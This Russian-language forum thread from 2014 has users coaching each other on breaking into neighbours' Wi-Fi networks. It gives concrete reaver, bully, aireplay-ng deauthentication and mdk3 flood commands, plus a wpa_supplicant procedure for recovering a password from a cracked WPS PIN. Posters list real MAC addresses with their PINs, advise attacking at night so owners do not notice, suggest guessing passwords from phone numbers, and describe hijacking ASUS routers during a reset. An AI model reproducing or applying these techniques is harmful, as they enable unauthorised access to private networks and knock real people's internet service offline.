добрый день. я тоже воспользовалась скриптом Klaatu..оставила на ночь,утром обнаружила,что точка изменила название,стала зваться именем роутера и в итоге совсем пропала. именно пропала. ведь все-равно включен wps или нет,её должно быть видно с airodump...что скажете?
Там есть опция "Отключить ПИН устройства" (нужно поставить галочку). Там же сбоку написано, что ПИН отключается автоматически если обнаружатся неудачные попытки подключения, т.е. не wps отключается, а доступность ПИНа. Похоже, что картина такая: когда мы сгоняем роутер с текущего канала утилитой mdk3, он при переходе на другой канал довольно часто (не всегда) теряет эту галочку и вновь становится доступным ПИН.
Сделай СКРИН
Нашел инструкцию к той модели, с которой познакомился, вот что там написано:
http://s020.radikal.ru/i721/1402/44/4c96047a293f.jpg
добрый день. я тоже воспользовалась скриптом Klaatu..оставила на ночь,утром обнаружила,что точка изменила название,стала зваться именем роутера и в итоге совсем пропала. именно пропала. ведь все-равно включен wps или нет,её должно быть видно с airodump...что скажете?
На роутере есть кнопка включения/отключения wi-fi модуля. Скорее всего его просто выключили, у меня тут тоже постоянно его выключают. Изменилось название? Наверно хозяин вернулся к заводским настройкам.
Там есть опция "Отключить ПИН устройства" (нужно поставить галочку). Там же сбоку написано, что ПИН отключается автоматически если обнаружатся неудачные попытки подключения, т.е. не wps отключается, а доступность ПИНа. Похоже, что картина такая: когда мы сгоняем роутер с текущего канала утилитой mdk3, он при переходе на другой канал довольно часто (не всегда) теряет эту галочку и вновь становится доступным ПИН.
У меня тоже такое происходило..... но я ещё заметил что:
Когда срабатывает MDK и в этот момент хозяин точки Откл./Вкл. вот тогда оно и происходит, Reaver не может начать сесию.
dima-kruger
15.02.2014, 20:04
Прошу прошения, но временя не позволяет читать 100+ страниц, если есть какие-то решения по поводу: WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking , подскажите! Заранее спасибо
Vikhedgehog
15.02.2014, 20:23
добрый день. я тоже воспользовалась скриптом Klaatu..оставила на ночь,утром обнаружила,что точка изменила название,стала зваться именем роутера и в итоге совсем пропала. именно пропала. ведь все-равно включен wps или нет,её должно быть видно с airodump...что скажете?
Вряд ли бы хозяину понравилось, что wi-fi обрывается каждые 60 сек, не так ли? Точка пропала - либо отправили ее в сервис центр, либо в мусорку. Надо часто поглядывать не подключен ли кто-то другой во время работы скрипта, иначе будут думать что точка сломалась. Советую всегда перед применением любой хакерской программы тщательно изучить как она устроена и возможные последствия.
Vikhedgehog
15.02.2014, 20:27
ничего не могу понять, что произошло с работой ривера
зацепился за точку NETGEAR
с командой reaver -i mon0 -b xx:xx:xx:xx:xx:xx -S -N -a -vv
шатко-валко, но перебор шел. оставил на ночь.
утром пришел, перебор остановился на 20% и зациклился в WARNING : Failed to associate with xx:xx:xx:xx:xx:xx
плюс вижу, что роутер прыгнул с 6 канала на 13ый канал.
сейчас, уже пробовал по разному и все равно не могу запустить перебор на данном роуте.
сигнал по уровню прежний.
Спалили взлом и отключили WPS скорее всего.
Вряд ли бы хозяину понравилось, что wi-fi обрывается каждые 60 сек
Я все же придерживаюсь мнения,что точка не перегружается...а вот про выключили wifi модуль интересно!
Надо часто поглядывать не подключен ли кто-то другой во время работы скрипта, иначе будут думать что точка сломалась. Советую всегда перед применением любой хакерской программы тщательно изучить как она устроена и возможные последствия.
никто не был подключен...по wifi...по кабелю- не могу определить...
никто не был подключен...по wifi...по кабелю- не могу определить...
Запускаешь:
airodump-ng --bssid xx:xx:xx:xx:xx:xx -c (ch) mon0
и смотришь, если data пакеты сыпятся - значит подключены, не останавливай, открывай второе окно:
aireplay-ng -0 4 -a xx:xx:xx:xx:xx:xx mon0
отключай всех, а когда никого не останется, а data пакеты всё равно сыпятся, значит по проводу сидят.
Я не уверен, но мне кажется, что через прослушивание wi-fi модуля подключенных по проводам никак не увидеть. У них даже мак адреса разные: у роутера и у wi-fi модуля.
Запускаешь:
airodump-ng --bssid xx:xx:xx:xx:xx:xx -c (ch) mon0
и смотришь, если data пакеты сыпятся - значит подключены, не останавливай, открывай второе окно:
aireplay-ng -0 4 -a xx:xx:xx:xx:xx:xx mon0
отключай всех, а когда никого не останется, а data пакеты всё равно сыпятся, значит по проводу сидят.
мерси,попробую!!!
и в итоге совсем пропала. именно пропала. ведь все-равно включен wps или нет,её должно быть видно с airodump...что скажете?
Конечно же, точку должно быть видно в airodump, т.к. он фильтрует по BSSID, который нельзя изменить так просто, как название точки.
Нужно было сразу, как только заметила такое поведение, прервать перебор. А ты видимо наоборот, поставила перебирать и днем "до победного конца". Если видишь такое поведение, значит лох занервничал, нужно было ставить перебор сугубо на позднюю ночь, например с часу-двух до полшестого-шести. Было бы дольше, зато безопасно. Жадность фраера сгубила - правило на все времена
А говоря строго, нужно было сначала с недельку точку помониторить, на предмет утреннего времени включения/ночного отключения для клиентов, в airodump есть для этого опция --output-format=csv Тогда стало бы ясно, когда точку можно атаковать, чтобы не стать жертвой "подозрительной активности".
Теперь же, как мне кажется, точка действительно либо ушла в утиль, либо в сервис. Потому как я склонен думать, что фактической перезагрузки точки не проиходит, а просто меняется канал и перезапусается wifi-модуль. Проверить у меня сейчас возможности нет, может быть поможет форумчанин 4pip, у которого получилась данная атака.
В вебморде там есть вкладка status, там видно аптайм точки, посмотри, не обнуляется ли он после атаки mdk и последующей смены канала. Если не обнуляется - то да, фактической перезагрузки точки не происходит, и отваливаются только wifi-клиенты. Если же точка перезагружается - тогда, конечно же, инет у хозяина пропадает и на кабеле. В этом случае, он, допустим, мог позвонить в саппорт, и уже там ему могли подсказать это решение - выключить нафик wifi модуль, если им не пользуешься.
PS Еще есть теоретический вариант, что хозяин уменьшил мощности точки - некоторые производители это допускают, или переставил ее куда подальше, и ты просто перестала ее слышать.
paulo, не переживай! Сейчас многие обеспокоены влиянием излучения всех этих wi-fi, ищут устройства с кнопкой отключения и активно ею пользуются. У себя из дома я вижу от 60 до 90 точек в зависимости от времени, т.е. треть владельцев отключают их время от времени.
Сходил в tp-link и посмотрел системные логи. Я к нему стучался несколько часов и за это время не было ни одной перезагрузки согласно журналу. Так что после mdk3 происходит лишь передергивание доступности пина для работы, даже не статуса wps. Часто происходит смена канала, но не всегда. Более того, иногда происходит смена канала, а передергивание статуса пина не происходит. Кроме этого иногда дает 11 попыток подбора пина, иногда менее 10-ти, но на это много может быть причин.
Еще рекомендую попробовать mdk3 без параметра -s, при этом можно менее продолжительное время. Мне хватало 10 секунд, но после нахождения первых 4-х цифр точка стала устойчивее и пришлось увеличивать время работы mdk3 сначала до 11 сек, потом до 12. И пауза после этого годилась сначала 8 сек, а потом ставил 10. Конечно, все от качества сигнала, но тенденция у меня наблюдалась именно такая.
как только заметила такое поведение, прервать перебор. А ты видимо наоборот, поставила перебирать и днем "до победного конца". Жадность фраера сгубила - правило на все времена
Я не жадничала!!! потому как я начала перебор в 1.30 ночи, и закончила в 6.30. Это был будний день(если это имеет значение). Утром я обнаружила,что точка сменила имя. За ночь перебрал 500 пинов...Затем, пробовала в след вечер. Но, не было ассоциации с точкой. Я бросила. На след день -airodump-ng- точка пропала. Вся история)))
Еще рекомендую попробовать mdk3 без параметра -s, при этом можно менее продолжительное время
Я знаю, -s 200 нужен для того, чтобы не так сильно засырать эфир себе и соседям, как на дефолтном значении 500. Если у тебя два адаптера, то попробуй на первом поднять линк, а после этого на втором запустить мдк к любой другой точке.
ВНИМАНИЕ! Я был не прав! Только что перепроверил! mdk3 перегрузила роутер. Журнал был коротким и первый раз я не обратил внимание, что дата и время там выставлены неправльно. У меня mdk3 перегружает роутер!
Без параметра s точка теряется из виду примерно через 7-8 секунд работы mdk3 и вновь появляется примерно через 8-10 секунд после этого. Что-то уж очень оперативно, но в журнале все стирается и первым идет сообщение system started.
dima-kruger
15.02.2014, 23:09
Если кто знает как решить проблему
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
...
Помогите плиз
Stalker5
15.02.2014, 23:19
Если кто знает как решить проблему
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
...
Помогите плиз
Тоже интересует !
Alex1709
16.02.2014, 02:51
Ребята в этой ветке можете помочь подобрать PIN код к точке с такими данными 2C:39:96:97:BC:В4 ROSTELECOM_BFB3
"WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking"
решается в основном визуально опция ривера -L
Всем привет!Кто-то делал ето (Hopefully this helps out any future wanderers who recover a PIN w/reaver but no PSK, as I have had this happen a few times myself with different testing devices and firmwares.
I am not 100% certain why this occurs, but I have a feeling that there’s more than one reason behind it. Regardless, it's important to know that you CAN authenticate to the AP with just the pin, and in many cases, you will be able to recover that sessions PSK, albeit a manual processes.
I use debian squeeze (6.0), with kernel 3.2.0-0 from backports, along with latest compat-wireless (3.3.1). I have tested this with wpa_supplicant from the repos (v0.6.10), and not from source.
First, set yourself up a very basic wpa_supplicant.conf in /etc/wpa_supplicant.conf:
--
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
--
Second, start wpa_supplicant in daemon mode:
wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B
Third, run wpa_cli, and verify that it's working by issuing command 'status'. You should see wpa_state=INACTIVE
Fourth, lets add our BSSID and PIN:
wps_reg xx:xx:xx:xx:xx:xx 12345678
You should see an "OK". Wait a few more seconds as wpa_supplicant picks up the BSSID and tries to associate and perform key negotiation. What you want to see is "CTRL-EVENT-CONNECTED", which will indicate that the PIN was accepted and that you're now associated.
At this point, if you were to exit wpa_cli, you could run dhclient on wlan0 and would be offered an IP from the AP, assuming DHCPd were enabled.
Go ahead and type the command 'save', which should output another "OK". This will update the wpa_supplicant.conf file, as specified from the command line, with a static configuration for this new network.
Verify by: cat /etc/wpa_supplicant.conf
If all went well, you should have a line under this new network titled 'psk'.
Good luck!
я вот два раза уже пробывал но не выходить не как!
Vikhedgehog
16.02.2014, 15:54
Конечно же, точку должно быть видно в airodump, т.к. он фильтрует по BSSID, который нельзя изменить так просто, как название точки.
Нужно было сразу, как только заметила такое поведение, прервать перебор. А ты видимо наоборот, поставила перебирать и днем "до победного конца". Если видишь такое поведение, значит лох занервничал, нужно было ставить перебор сугубо на позднюю ночь, например с часу-двух до полшестого-шести. Было бы дольше, зато безопасно. Жадность фраера сгубила - правило на все времена
А говоря строго, нужно было сначала с недельку точку помониторить, на предмет утреннего времени включения/ночного отключения для клиентов, в airodump есть для этого опция --output-format=csv Тогда стало бы ясно, когда точку можно атаковать, чтобы не стать жертвой "подозрительной активности".
Теперь же, как мне кажется, точка действительно либо ушла в утиль, либо в сервис. Потому как я склонен думать, что фактической перезагрузки точки не проиходит, а просто меняется канал и перезапусается wifi-модуль. Проверить у меня сейчас возможности нет, может быть поможет форумчанин 4pip, у которого получилась данная атака.
В вебморде там есть вкладка status, там видно аптайм точки, посмотри, не обнуляется ли он после атаки mdk и последующей смены канала. Если не обнуляется - то да, фактической перезагрузки точки не происходит, и отваливаются только wifi-клиенты. Если же точка перезагружается - тогда, конечно же, инет у хозяина пропадает и на кабеле. В этом случае, он, допустим, мог позвонить в саппорт, и уже там ему могли подсказать это решение - выключить нафик wifi модуль, если им не пользуешься.
PS Еще есть теоретический вариант, что хозяин уменьшил мощности точки - некоторые производители это допускают, или переставил ее куда подальше, и ты просто перестала ее слышать.
У меня получилось ломануть точку TP-LINK этим способом буквально позавчера, действительно происходит полная перезагрузка. В настройках показывало аптайм всего несколько минут.
Vikhedgehog
16.02.2014, 15:59
Я не жадничала!!! потому как я начала перебор в 1.30 ночи, и закончила в 6.30. Это был будний день(если это имеет значение). Утром я обнаружила,что точка сменила имя. За ночь перебрал 500 пинов...Затем, пробовала в след вечер. Но, не было ассоциации с точкой. Я бросила. На след день -airodump-ng- точка пропала. Вся история)))
Не повезло, видимо хозяин - сова.
Не повезло, видимо хозяин - сова.
Буду пробовать дальше. Еще...есть еще пара точек..может,с ними выйдет. Буду впредь аккуратнее. Блин,теперь совесть мучает((
Vikhedgehog
16.02.2014, 16:33
Кстати, я вспомнил тут один способ, с которым теоретически можно взломать новые точки ASUS без возни с wps. Тут главное - везение.
По умолчанию у их роутеров две незапароленные сетки: ASUS и ASUS_5G. Если пароль уже стоит, можно атаковать точку с mdk3, а когда хозяин попытается настроить по новой, надо очень быстро подключится к точке ASUS или ASUS_5G, зайти в настройки с дифолтным логином/паролем и сохранить PIN. Когда поставят пароль - вытащить его с ривером (опция -p). Нужно только систему уведомлений придумать, тк такая возможность украсть pin будет всего несколько минут.
Совесть - это хорошо Еще раз повторю: согласно системным логам действительно происходит перезагрузка. И надо отдать должное роутерам tp-link: перегружаться через каждые 50 секунд в течении 8-ми часов - это круто. Да еще и как перегружаться - за 8-10 секунд. Таким устройствам не надо ни в утиль, ни в сервис.
А еще я подумал в связи с этим, что правильнее иметь роутер и wi-fi точку доступа в виде двух раздельных устройств, а не два в одном. Так будет надёжнее.
Vikhedgehog
17.02.2014, 04:25
Добавляю WPS PIN от своего сломанного TL-WR841N v8
F8:1A:67:05:36:06
02049748
Еще от старого NETGEAR MBRN3000:
C4:3D:C7:70:D2:10
71198200
"WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking"
решается в основном визуально опция ривера -L
так а толку wps то заблочен,ничего перебираться не будет,толку опцию -L ставить
Кстати, я вспомнил тут один способ, с которым теоретически можно взломать новые точки ASUS без возни с wps. Тут главное - везение.
По умолчанию у их роутеров две незапароленные сетки: ASUS и ASUS_5G. Если пароль уже стоит, можно атаковать точку с mdk3, а когда хозяин попытается настроить по новой, надо очень быстро подключится к точке ASUS или ASUS_5G, зайти в настройки с дифолтным логином/паролем и сохранить PIN. Когда поставят пароль - вытащить его с ривером (опция -p). Нужно только систему уведомлений придумать, тк такая возможность украсть pin будет всего несколько минут.
та способ вроде интересный,но.....как узнать,что точка перезагрузилась,всё сбросилось и на данный момент точка открыта? чтобы быстро в веб морду зайти
так так наверное не только с асусом можно,а вообще со семи точками,но нужно видеть этот момент,при котором точка открыта становится,что бы зайти в веб морду......а вот как этот момент подгадать и увидеть....
СЕРЖ32
Разные точки ведут себя по разному. Иногда показывает, что залочена, поставишь ей -L и она еще несколько пинов проходит. Сам случайно обнаружил, был приятно удивлен. А то некоторые точки ушли в лок пожизненно как козалось ранее.
СЕРЖ32
Разные точки ведут себя по разному. Иногда показывает, что залочена, поставишь ей -L и она еще несколько пинов проходит. Сам случайно обнаружил, был приятно удивлен. А то некоторые точки ушли в лок пожизненно как козалось ранее.
та знаю такое,тоже пробовал ну так же,несколько пинов перебирает и опять лок......Так что ничего интересного нет в этой опции -L,толку от неё.....ну переберёт ещё несколько пинов ну и опять залочится на время,а ведь лочится не на минутку Так что это гемморойные точки
у меня таких точек,которые пожизненно ушли в лок,наверное штук 50 даже время тратить не хочу(а главное нервы)
Помогите пожалуйста.
Ривер зависает на Sending identity response.
лог:
[+] Switching mon0 to channel 5
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxx )
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
и дальше не продвигается и ничего не пишет. пробовал ждать почти сутки.
Помогите пожалуйста.
Ривер зависает на Sending identity response.
лог:
[+] Switching mon0 to channel 5
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxx )
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
и дальше не продвигается и ничего не пишет. пробовал ждать почти сутки.
Похоже на то, что точка не дает попробовать пин. Так умеет, например, tp-link. Попробуй запустить mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -m примерно на 8-10 секунд, выжди после завершения не менее 10-12 секунд и попробуй снова запустить reaver с параметром -L.
Итак,можно подытожить: эти "грязные вонючки" TP-Link таки ломаются,НО 1) лочатся через каждые ( если повезет) 10 пинов;
2) не просто меняют очень быстро канал ( в течение,буквально 10-12 сек) но они перезагружаются за это время!!!;
3) как-то не все хорошо и с радостью делают эту перезагрузку при помощи mdk3.
4) меняют пару раз в сутки сами канал ( что дает возможность получить АЖ 20-25 пинов В СУТКИ, не используя mdk3, вот только мне не понятно-меняя канал,они перезагружаются или как??.
Кстати,пробовала я mdk3 в разных системах. Не пойму почему,корректно работает исключительно в BackTrack) но там я фильм посмотреть не могу,пока работает(((
5) ну и раз все же перезагружаются-надо мониторить когда нет клиентов... А то все труды на смарку+мучащая совесть,что ребята понесли в сервис роутер ни за что, ни про что.
Ничего не упустила?
вот только мне не понятно-меняя канал,они перезагружаются или как??.
Я подозреваю что перезагружаются, а иначе ты не смогла б перебрать (+/- 10 пинов). А по большому счёту это не столь так важно, главное что у них нет DOS-защиты, а то к таким точкам надо иметь очень большое терпение.
Похоже на то, что точка не дает попробовать пин. Так умеет, например, tp-link. Попробуй запустить mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -m примерно на 8-10 секунд, выжди после завершения не менее 10-12 секунд и попробуй снова запустить reaver с параметром -L.
Спасибо, но не помогло.
Роутер асус если что.
Кое-что требует проверки, но у меня есть, что добавить.
На руках имеется точка доступа (без роутера) TP-Link WA901N v.2. Она перезагружается примерно за 30 секунд. Есть подозрение, что после mdk3 у современных комбинированных роутеров происходит какая-то упрощенная, ускоренная перезагрузка за 8-10 секунд, может быть только части, связанной с wps и только у wi-fi модуля, но если они с роутером два-в-одном, то и проводной модуль может это ощущать. Системный лог при этом весь стирается и пишется заново, как после перезагрузки.
Еще интересный момент. Включаю на TP-Link WA901N режим QSS (аналог wps), а его все равно не видит wash. При этом reaver спокойно начинает подбор, причем без блокировок, а bully говорит, что точка без wps и ничего не подбирает. Нажимаю на корпусе кнопку wps, и тогда точка становится видимой для wash и bully. При этом действие кнопки не ограничено, т.е. точка так и ждет подключения через пин. Работа mdk3 этой точке безразлична. Но у меня на руках модель уже старая (v.2). Похоже, что у текущих моделей написано про стандартный wps, они не дают пробовать пин более 10-11 раз, зато реагируют на mdk3.
Включаю на TP-Link WA901N режим QSS (аналог wps), а его все равно не видит wash. При этом reaver спокойно начинает подбор, причем без блокировок
интересно!!!
При этом reaver спокойно начинает подбор, причем без блокировокзато реагируют на mdk3.
чем пользуетесь? Kali,wifislax,Back???
Хочу еще раз всё проверить ... Использую USB wifislax 4.8 rc2
Использую USB wifislax 4.8 rc2
Чем лучше чем предыдущие версии??
ollemebyssan
18.02.2014, 00:36
Всем привет, снова прошу помощи, как правильнее раздать(перераздать) взломанный Wi-fi, так как появилось много устройств, 2 бука, 2 смартфона и планшет, буки конечно в сети я скрыл, а вот остальное не получится, да и то буки тоже при желании можно увидеть в сети. В идеале нужно некое подобие репитера но только чтобы у него была своя подсеть, чтобы хозяин максимум увидел только репитер. Также есть постоянно включенный комп, может как то через него перераздать инет? Спасибо заранее.
P.s Так к слову) Чуть выше писали про TP-Link c таким mac
10:FE:ED:79.....
Сегодня у меня тоже появилась такая сетка, поставил на перебор сначало прошло всего 12 пинов и зависло, перезагрузил вирт.машину поставил опять. сейчас 9.45 % 4 сек/pin если все норм пройдет pin выложу здесь, может кому то поможет, хотя б первые 4
если все норм пройдет pin выложу здесь, может кому то поможет, хотя б первые 4
Держу кулачки!!!! Буду бесконечно благодарна за первые 4-ре!!!! У меня не колется 10:FE:ED:FC...
Держу кулачки!!!! Буду бесконечно благодарна за первые 4-ре!!!! У меня не колется 10:FE:ED:FC...
A mdk3 не помогает?
A mdk3 не помогает?
http://radikale.ru/data/upload/6895e/6895e/e4e4a0c340.jpg
Работает так(((
paulo
Держи кулачки!!!!
6089 первые с такого начала мака 10:FE:ED. Только я его срисовал зайдя на него. Это TL-740N. А WPS там отключен. А если включить, то можно любой Восстановить, создать новый PIN. C поролем повезло, GoyScript WPA с аиркреком на первом словаре подобрал.
paulo
Держи кулачки!!!!
6089 первые с такого начала мака 10:FE:ED. Только я его срисовал зайдя на него. Это TL-740N. А WPS там отключен. А если включить, то можно любой Восстановить, создать новый PIN. C поролем повезло, GoyScript WPA с аиркреком на первом словаре подобрал.
Спасибо,моя гипотеза про то,что пин начинается от 8000 с треском провалилась))))
Vikhedgehog
18.02.2014, 03:45
Когда я ломал у 10:FE:ED первые 4 были:
2592
Но думаю тут как-то зависит от последних 6 значений мак адреса.
Когда я ломал у 10:FE:ED первые 4 были:
2592
Но думаю тут как-то зависит от последних 6 значений мак адреса.
Вот что я нашла на форуме http://airslax.net/forum/4-19-1
"время от времени возле меня появляется точка TP-Link 627EC8. Если эти цифры/буквы перевести из НЕХ в ДЕС, то выйдет 7-ми значное число. Появилась мысль, что вычислив чексумм (8-мое число) получим ПИН-код.
Вопрос: как это контрольное число получить?"
У меня точка после атаки mdk, уж не знаю,что она там натворила,но вместо названия-имя роутера . Мак 10:FE:ED:FC:28:24 , название точки Tp-Link_FC2824... Может... Стоит попробовать? Только я не знаю как переводить их НЕХ в ДЕС. Поможете?
Помогите пожалуйста.
Ривер зависает на Sending identity response.
лог:
[+] Switching mon0 to channel 5
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxx )
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
и дальше не продвигается и ничего не пишет. пробовал ждать почти сутки.
не у кого никаких идей нету? проблема то распространенная
та у тп линка какой угодно пин может быть,никакой тут скрипт не прокатит,это же не кинетик тп линки пин не по этой схеме придумывают...
Vikhedgehog
18.02.2014, 14:06
не у кого никаких идей нету? проблема то распространенная
Сам такое встречал. Это все точки ASUS: новые лочат wps, средние на identity response повисают, ADSL точки вообще с отключенным по умолчанию WPS. Остается лишь очень узкий круг точек из какого нибудь 2010 где прошивку забыли обновить, такие вот можно спокойно взламывать. Советую с хэндшейком попробовать, очень многие люди ставят свой мобильный номер без восьмерки (а иногда с). На точках ADSL можно попробовать домашние номера (499, 495). Иногда встречается вообще чего-нибудь простое типо 8-значное число или 111111111. Еще редко, но бывает (если название сетки короткое) то пароль название сети маленькими буквами + немного чисел, максимум 6. Есть даже такие кто использует "узоры" типо 1q2w3e4r5t6y. Это немного не в тему, просто совет для тех кто еще не пробовал.
Vikhedgehog
18.02.2014, 14:19
Вот что я нашла на форуме http://airslax.net/forum/4-19-1
"время от времени возле меня появляется точка TP-Link 627EC8. Если эти цифры/буквы перевести из НЕХ в ДЕС, то выйдет 7-ми значное число. Появилась мысль, что вычислив чексумм (8-мое число) получим ПИН-код.
Вопрос: как это контрольное число получить?"
У меня точка после атаки mdk, уж не знаю,что она там натворила,но вместо названия-имя роутера . Мак 10:FE:ED:FC:28:24 , название точки Tp-Link_FC2824... Может... Стоит попробовать? Только я не знаю как переводить их НЕХ в ДЕС. Поможете?
Точки TP-LINK берут эти буквы и цифры не из какого-то алгоритма, а прямо из MAC адреса. Тут я согласен с сержем32 что таким способом пин вряд ли найдется. Кстати если точка называется TP-LINK_XXXXXX то стоит попробовать брутом, там по умолчанию 8 значное число, даже слабый комп за день переберет! А так можете попробовать к своей точке 6525348, последнее число ривер сам находит.
Кстати если точка называется TP-LINK_XXXXXX то стоит попробовать брутом, там по умолчанию 8 значное число, даже слабый комп за день переберет!
Хм ... За день говорите?)))))
binarymaster
18.02.2014, 16:57
8 значное число, даже слабый комп за день переберет!
Хм ... За день говорите?)))))
8-значный ключ из цифр...
Это всего 100000000 ключей.
На моём Intel Atom N550, а это 2 ядра по 1.5 ГГц
- скорость перебора WPA ~500 п/с под пингвином, ~400 с чем-то под окнами.
Перебор займёт минимум 200000 секунд = 3333 минуты = 55 часов = 2.3 дня
А процессор-то далеко не самый слабый. Так то!
saimonyz
19.02.2014, 00:23
подскажите как можно обойти wps locked есть какие то способы ?
подскажите как можно обойти wps locked есть какие то способы ?
та ну....все бы так и обходили б и не было б с этим проблем,а так.... Ну тут некоторые про дос атаку говорят,но это всё время,при чём конкретное время.....так месяцами можно пины перебирать.....
Сам такое встречал. Это все точки ASUS: новые лочат wps, средние на identity response повисают, ADSL точки вообще с отключенным по умолчанию WPS. Остается лишь очень узкий круг точек из какого нибудь 2010 где прошивку забыли обновить, такие вот можно спокойно взламывать. Советую с хэндшейком попробовать, очень многие люди ставят свой мобильный номер без восьмерки (а иногда с). На точках ADSL можно попробовать домашние номера (499, 495). Иногда встречается вообще чего-нибудь простое типо 8-значное число или 111111111. Еще редко, но бывает (если название сетки короткое) то пароль название сети маленькими буквами + немного чисел, максимум 6. Есть даже такие кто использует "узоры" типо 1q2w3e4r5t6y. Это немного не в тему, просто совет для тех кто еще не пробовал.
И ничего нельзя сделать с этими асусами? по хендшейку давно уже бы подобрал конечно, но пасс видимо сложный.
И ничего нельзя сделать с этими асусами? по хендшейку давно уже бы подобрал конечно, но пасс видимо сложный.
конечно ничего,та и хендшейк и расшифровка,это геммор......если бы точно знать,что там скажем,одни цифры,то можно пытаться,а так.......это как иголку в стогу сена искать.....мало ли какой пасс сложности....лотерея...
ollemebyssan
19.02.2014, 22:52
вот
вообщем пишу о результатах.
Пару дней назад тут шел разговор о TP linke 10:E:ED
за два дня перебора, он менял кананлы, зависал, выдвал ошибки в итоге пин вот такой 57665184, но вывод в wpsskripts был не обычный а вот такой http://radikale.ru/data/upload/6895e/6895e/d82a86bb6e.jpg
подключиться с таким ключем не возможно, кто чем подскажет???
вообщем пишу о результатах.
Пару дней назад тут шел разговор о TP linke 10:E:ED
за два дня перебора, он менял кананлы, зависал, выдвал ошибки в итоге пин вот такой 57665184, но вывод в wpsskripts был не обычный а вот такой http://radikale.ru/data/upload/6895e/6895e/d82a86bb6e.jpg
подключиться с таким ключем не возможно, кто чем подскажет???
Попробуй задать:
bully mon0 -b xx:xx:xx:xx:xx:xx -S -w /root/ -c (ch)
потом подставь свой пин и получишь пасс.
BULLY Получше вытягивает пассы чем reaver.
Из моего опыта такое случается с устройством после того, когда к нему подключились по пину и произошёл какой-то сбой. Точка меняет название именно на Network ХХХХ..... (у меня было такое с Zyxel), а пароль становится максимальной длины в 64 символа. Ждать горячей перезагрузки или пробовать зайти именно с таким 64 символьным паролем.
Из моего опыта такое случается с устройством после того, когда к нему подключились по пину и произошёл какой-то сбой. Точка меняет название именно на Network ХХХХ..... (у меня было такое с Zyxel), а пароль становится максимальной длины в 64 символа. Ждать горячей перезагрузки или пробовать зайти именно с таким 64 символьным паролем.
Нет не получится зайти с таким 64 символьным паролем, но зато получится зайти по пину и слетят настройки, либо Bully пробуй....
ollemebyssan
19.02.2014, 23:38
Нет не получится зайти с таким 64 символьным паролем, но зато получится зайти по пину и слетят настройки, либо Bully пробуй....
Блин, конечно извиняюсь, поломал точек 10-15, не скажу что спец, но про bully первый раз слышу, гугл немного непонятно про него выдал, расскажи те поподробнее в чем он есть? юзаю wifislax 4.4, походу устврел, так как видел новее версии просто давно не ломал.Спасибо
Блин, конечно извиняюсь, поломал точек 10-15, не скажу что спец, но про bully первый раз слышу, гугл немного непонятно про него выдал, расскажи те поподробнее в чем он есть? юзаю wifislax 4.4, походу устврел, так как видел новее версии просто давно не ломал.Спасибо
Wifislax 4.6 и выше, Kali Linux 1.0.5 и выше
ollemebyssan
20.02.2014, 00:02
Wifislax 4.6 и выше, Kali Linux 1.0.5 и выше
Спасибо, понял! Но завтра уже наверно попробую. Сейчас кстати качнул утилку QSS Wireless тплинковская для подключения по пину, через нее попробовал, типа подключился по пину, но написано что подключен не к тплинк, а к Network и цифорки какието, и нужная сеть из поиска пропадает.
Как раз картинка показывает, что по пину заходили и настройки (которые были) уже слетели. Я в свое время не успел толком ничего попробовать - роутер перегрузили. Про bully всё верно, это аналог ривера, только он ничего нового здесь не даст.
ollemebyssan
20.02.2014, 00:14
Как раз картинка показывает, что по пину заходили и настройки (которые были) уже слетели. Я в свое время не успел толком ничего попробовать - роутер перегрузили. Про bully всё верно, это аналог ривера, только он ничего нового здесь не даст.
И за это спасибо, но после того как пытался подключился по пину и т.д что писал выше, сетка пропала, думал глюк! Комп перезагрузил, все равно ее нет. И вот ты написал что подкючались уже по пину, что пин изменился что ли? вроде же не должен? или ошибаюсь
Немного не пойму, что значит сетка пропала. Её нет в эфире? Значит выключили. А если есть, но с другим названием (мак-адрес ведь тот же), работай с новым названием точки. По длинному паролю видимо не зайти, пробуй по пину через QSS. Посмотришь название модели и т.д. пока вход в вэб-интерфейс по-умолчанию. Скорее всего скоро хозяин всё изменит. Главное, чтобы wps остался включенным.
Как раз картинка показывает, что по пину заходили и настройки (которые были) уже слетели. Я в свое время не успел толком ничего попробовать - роутер перегрузили. Про bully всё верно, это аналог ривера, только он ничего нового здесь не даст.
Когда то, я reaverom одну точку сколько не мучал выдавала вот этот 64 символический ключ и потом USER100 поднял вопрос кто попробовал Bully?
Вот тогда bully мне показал на что он способен. Пароль отжал у точки - это первое, второе почти в два раза быстрее перебирает чем Reaver. Но по дальности Reaver чемпион, bully даже не может зацепится.
Со всем согласен, только тут название точки слетело - это признак сбоя. Мне тоже не отдавал пароль один Highgates - отдал только bully. У каждого есть свои особенности: например ривер работает с tp-link когда булли не может, а булли не пропускает правильные пины от trendnet, а ривер пропускает. Булли (у меня в wifislax) обязательно нужно канал указывать, а риверу не нужно. Булли выдает более информативные сообщения о том, что происходит, зато у ривера красивенько всё и разноцветно. Так что ситуация ... типа выбора блесны рыбаками ...правда всего из двух вариантов.
ollemebyssan
20.02.2014, 00:44
Немного не пойму, что значит сетка пропала. Её нет в эфире? Значит выключили. А если есть, но с другим названием (мак-адрес ведь тот же), работай с новым названием точки. По длинному паролю видимо не зайти, пробуй по пину через QSS. Посмотришь название модели и т.д. пока вход в вэб-интерфейс по-умолчанию. Скорее всего скоро хозяин всё изменит. Главное, чтобы wps остался включенным.
